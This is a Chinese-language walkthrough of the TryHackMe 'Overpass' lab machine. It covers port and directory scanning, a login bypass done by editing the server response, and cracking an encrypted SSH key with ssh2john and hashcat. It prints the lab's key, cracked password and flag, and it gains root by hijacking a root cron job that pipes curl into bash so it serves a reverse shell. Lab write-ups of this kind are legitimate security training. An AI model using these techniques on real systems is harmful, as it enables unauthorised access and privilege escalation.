THM靶机学习-Overpass

admin
admin
admin
141215
文章
117
评论
2024年7月14日11:14:17评论4 views字数 11520阅读38分24秒阅读模式

THM靶机-Overpass

知识点
1. js登录判断分析

2. 返回包修改绕过检测

3. ssh2john提取hash john破解

4. cron定时任务反弹shell提权



端口扫描

─# nmap 10.10.32.202 -T5 Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-27 21:00 CST                                       Nmap scan report for 10.10.32.202                                                                     Host is up (0.34s latency).                                                                           Not shown: 998 closed tcp ports (reset)                                                               PORT   STATE SERVICE                                                                                  22/tcp open  ssh                                                                                      80/tcp open  http                                                                                     

Nmap done: 1 IP address (1 host up) scanned in 2.86 seconds                                           

┌──(root㉿kali)-[/tmp]                                                                                └─# nmap 10.10.32.202 -T5 -p 22,80 -A                                                                 Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-27 21:01 CST                                       Nmap scan report for 10.10.32.202                                                                     Host is up (0.31s latency).                                                                           

PORT   STATE SERVICE VERSION                                                                          22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                     | ssh-hostkey:                                                                                        |   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)                                        |   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)                                       |_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)                                     80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)                        |_http-title: Overpass                                                                                Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)                           No exact OS matches for host (test conditions non-ideal).                                             Network Distance: 4 hops                                                                              Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                               

TRACEROUTE (using port 443/tcp)                                                                       HOP RTT       ADDRESS                                                                                 1   207.90 ms 10.2.0.1                                                                                2   ... 3                                                                                             4   336.96 ms 10.10.32.202                                                                            

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 43.56 seconds


目录扫描

└─# dirsearch -u 10.10.32.202 -x 403,301                                                                                                         _|. _ _  _  _  _ _|_    v0.4.2                                                                       (_||| _) (/_(_|| (_| )                                                                               

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927          

Output File: /root/.dirsearch/reports/10.10.32.202_24-03-27_21-04-27.txt                              

Error Log: /root/.dirsearch/logs/errors-24-03-27_21-04-27.log                                         

Target: http://10.10.32.202/                                                                          

[21:04:28] Starting:                                                                                  [21:04:50] 200 -  782B  - /404.html                                                                   [21:05:07] 200 -    1KB - /admin.html                                                                 [21:05:08] 200 -    1KB - /admin/                                                                     [21:05:08] 200 -    1KB - /admin/?/login                                                              [21:05:44] 200 -    2KB - /downloads/                                                                 [21:06:01] 200 -    2KB - /login.js                                                                   [21:06:03] 200 -   28B  - /main.js                                                                    

Task Completed



漏洞利用 js文件分析

http://10.10.67.242/login.js

async function postData(url = '', data = {}) {    // Default options are marked with *    const response = await fetch(url, {        method: 'POST', // *GET, POST, PUT, DELETE, etc.        cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached        credentials: 'same-origin', // include, *same-origin, omit        headers: {            'Content-Type': 'application/x-www-form-urlencoded'        },        redirect: 'follow', // manual, *follow, error        referrerPolicy: 'no-referrer', // no-referrer, *client        body: encodeFormData(data) // body data type must match "Content-Type" header    });    return response; // We don't always want JSON back}const encodeFormData = (data) => {    return Object.keys(data)        .map(key => encodeURIComponent(key) + '=' + encodeURIComponent(data[key]))        .join('&');}function onLoad() {    document.querySelector("#loginForm").addEventListener("submit", function (event) {        //on pressing enter        event.preventDefault()        login()    });}async function login() {    const usernameBox = document.querySelector("#username");    const passwordBox = document.querySelector("#password");    const loginStatus = document.querySelector("#loginStatus");    loginStatus.textContent = ""    const creds = { username: usernameBox.value, password: passwordBox.value }    const response = await postData("/api/login", creds)    const statusOrCookie = await response.text()    if (statusOrCookie === "Incorrect credentials") {        loginStatus.textContent = "Incorrect Credentials"        passwordBox.value=""    } else {        Cookies.set("SessionToken",statusOrCookie)        window.location = "/admin"    }}


登录如果返回值不为Incorrect credentials 则登录成功


修改返回包绕过检测

所以我们可以修改返回值来绕过登录

THM靶机学习-Overpass

THM靶机学习-Overpass

THM靶机学习-Overpass

登陆成功,页面有两个用户名James Paradox和一个id_rsa

Since you keep forgetting your password, James, I've set up SSH keys for you.

If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.Also, we really need to talk about this "Military Grade" encryption. - Paradox

-----BEGIN RSA PRIVATE KEY-----Proc-Type: 4,ENCRYPTEDDEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337

LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiNJHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljTWDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdvBMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZAL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUfABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZkVfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeROkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjzeeaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYnexxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGyAIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0in0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6zylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7-----END RSA PRIVATE KEY-----

THM靶机学习-Overpass

发现需要密码



ssh2john提取并破解密码

ssh2john提取hash 破解密码

└─# ssh2john id_rsa > id_rsa_hash

//将前缀ssh:删去

└─# hashcat id_rsa_hash   /usr/share/wordlists/rockyou.txt                                              hashcat (v6.2.6) starting in autodetect mode                                                            

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                                              ==================================================================================================================================================                                                              * Device #1: pthread-haswell-AMD Ryzen 7 5800H with Radeon Graphics, 1422/2909 MB (512 MB allocatable), 8MCU                                                                                                    

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.                               The following mode was auto-detected as the only one matching your input hash:                          

22931 | RSA/DSA/EC/OpenSSH Private Keys ($1, $3$) | Private Key                                         

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!                              Do NOT report auto-detect issues unless you are certain of the hash type.                               

This hash-mode is known to emit multiple valid candidates for the same hash.                            Use --keep-guessing to continue attack after finding the first crack.                                   

Minimum password length supported by kernel: 0                                                          Maximum password length supported by kernel: 256                                                        

Hashes: 1 digests; 1 unique digests, 1 unique salts                                                     Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates                            Rules: 1                                                                                                

Optimizers applied:                                                                                     * Zero-Byte                                                                                             * Not-Iterated                                                                                          * Single-Hash                                                                                           * Single-Salt                                                                                           

Watchdog: Temperature abort trigger set to 90c                                                          

Host memory required for this attack: 1 MB                                                              

Dictionary cache hit:                                                                                   * Filename..: /usr/share/wordlists/rockyou.txt                                                          * Passwords.: 14344385                                                                                  * Bytes.....: 139921507                                                                                 * Keyspace..: 14344385                                                                                  

$sshng$1$16$9f85d92f34f42626f13a7493ab48f337$1200$2cdbb9c10041cfba4a67771ce135a5c4852e0ffa29262d435693dad3aa708871e17bc663c37feffb19e6b52dcefaa88d2479cb4bca14551e929a8b30e29a8b19c3f70302afaf30d6b70db270eee635d36ccf02e9deeb68ec435d4c86f3bc96a5ef7fde50df64605d2e6bdad90ba9b0a08da21bab1d94d2f866ab1863baebbc3c5e099264833406ce407dc0a830d658d3583cb2f2a9dc963ba03887fc42b1e8a37d06bfe74031f8a94d2478dc518167f1e16b88c3ca45173f43efb85c936d576f04c5e6af7c6e2a407a23a93f8cb8ea59c2eb84f592d2a449ef5f06feef1ca985f7a0998cd0ea378e0a17617c5ec0649900be5b2d0161649346a19f8de671ce965d4e065d6d9ac50847060aef04fff64bd488bdeb8640544615486e3daa887c51dcac264b80e6e003ada0f4c802657268a9825a8a5fea57b5fb0cd9fd4a6b3420207864e564a5ff8e8aee5bb649b8051f0016d12cbc0554f3206a1ac1a7abd17cd1024b1ced6c59973e8570bd6450f7c67ea7c3223a845e6fb25fbaccba1af66455f5b68299a402bf320d0ca752e92859ec4f7831d6892960d644492ab40fec60aea6f5bfaff61cd5198d4dfcd3e5e7913a450e4ccaa67772e3d3bc842f26af9411ebcf9149bf33ccdeb8a647012c97c187d75d43e0be6b00a55cbac745720f0ff4142e9166f35591db690b401951b2d05289bf55a103ea634cbab053e735e5617b10d6f70e6e6a754a124a53f3463cde79a3c6e4ee14f45ab465a60f90c972242cd1569e370dee0a2a4c8ee4543ec52c5c7b7156d1beb7fbc4448188ab386719e13040a58faecf7e095def2312586b295f71c3fef31b62e890a3279631b6605200a6bf7d9d915566cd5738508291c33c18585ea13e32170ad7854d5f8d08d6fdc47491b84ebfb45f579c7b2f7eb1dd9b827c17655a4b7f8763399e8c2371b6277b1c4eb8e76a75acd38eb5cec913723ad605f563cb84b4476a9040917cef352384441dd325c6bcc9d6cab326ac7421b20083d7e766e2a01943860f0398f0294750b5cd16304f52c414ab7b28a01aa206f0dc6e6b692cc1e78310a57e962fec24ea9effc0e5fa58ca35325905f793370bb7713c512ca4b1dfa41c5fdaacacf4ca81b1dd2b2e45e8611ea0a5b19b016e7c74f9b9d4c7a41c3f9678ff284d8188e0f5424bf585f94f741adcb452683223da9fc4c548bb505c98987387c81db53d229f42f3e69298fab2f175468003d295c05b1d8979d78c7104d54c270eaaabbe006ebd7e8dbb1fa17e05e2f41b32ebca93f0789429312cba472ffc86072b5b3e530fc7e405ad26c166590b376f0f98e22c3e60b66899703813bcb13d7c9f5a6e0ae05320de78347b8ffb1d160949a5cb40e29e37071ffcb5b9762a4eec39818d52ec0bc7b227cba37aeb4ffc6700e65eb3ca5aa294e823e3eca24bcd7790d4e30893b0291b178368ca6e745af1bedd491cfb6836552e9267132f5b867e9aed6b52e3d4f14e88b9dd9075e3ea2e8242f8b2f272618211b908eb52689ead701d99b605f708a68662df7a5acc7287ce1d15b6fa12f5907953b49654f198f663663785deb244d25c220083ae62db9fd0b933477b83487606515a24864e6034ba27a624d9c5a4fcc967efe3a1000a40bc304a54ceff2c647dfec54f71e128b3a1d37c15db9ac895f9ea05cd4b6e8edca6bfc53b:james13                                      

Session..........: hashcat                                                                              Status...........: Cracked                                                                              Hash.Mode........: 22931 (RSA/DSA/EC/OpenSSH Private Keys ($1, $3$))                                    Hash.Target......: $sshng$1$16$9f85d92f34f42626f13a7493ab48f337$1200$2...bfc53b                         Time.Started.....: Fri Mar 29 21:23:05 2024 (1 sec)                                                     Time.Estimated...: Fri Mar 29 21:23:06 2024 (0 secs)                                                    Kernel.Feature...: Pure Kernel                                                                          Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)                                              Guess.Queue......: 1/1 (100.00%)                                                                        Speed.#1.........:   351.9 kH/s (0.48ms) @ Accel:256 Loops:1 Thr:1 Vec:8                                Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)                           Progress.........: 14336/14344385 (0.10%)                                                               Rejected.........: 0/14336 (0.00%)                                                                      Restore.Point....: 12288/14344385 (0.09%)                                                               Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1                                                   Candidate.Engine.: Device Generator                                                                     Candidates.#1....: havana -> cherry13                                                                   Hardware.Mon.#1..: Util: 14%                                                                            

Started: Fri Mar 29 21:22:47 2024                                                                       Stopped: Fri Mar 29 21:23:08 2024

碰撞得到密码为james13

└─# ssh -i id_rsa james@10.10.229.175

james@overpass-prod:~$ cat user.txt thm{65c1aaf000506e56996822c6281e6bf7}


提权

james@overpass-prod:~$ cat todo.txt To Do:                                                                                                  > Update Overpass' Encryption, Muirland has been complaining that it's not strong enough                > Write down my password somewhere on a sticky note so that I don't forget it.                            Wait, we make a password manager. Why don't I just use that?                                          > Test Overpass for macOS, it builds fine but I'm not sure it actually works                            > Ask Paradox how he got the automated build script working and where the builds go.                      They're not updating on the website

发现存在定时任务

james@overpass-prod:~$ cat /etc/crontab # /etc/crontab: system-wide crontab                                                                     # Unlike any other crontab you don't have to run the `crontab'                                          # command to install the new version when you edit this file                                            # and files in /etc/cron.d. These files also have username fields,                                      # that none of the other crontabs do.                                                                   

SHELL=/bin/sh                                                                                           PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin                                       

# m h dom mon dow user  command                                                                         17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly                                     25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )     47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )    52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )   # Update builds from latest code                                                                        * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

将overpass.thm与本机ip绑定,本机创建文件夹/downloads/src 并开启http服务,创建反向shell 并监听,拿下

THM靶机学习-Overpass

THM靶机学习-Overpass
THM靶机学习-Overpass

原文始发于微信公众号(ZeroPointZero安全团队):THM靶机学习-Overpass

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月14日11:14:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   THM靶机学习-Overpasshttps://cn-sec.com/archives/2950483.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息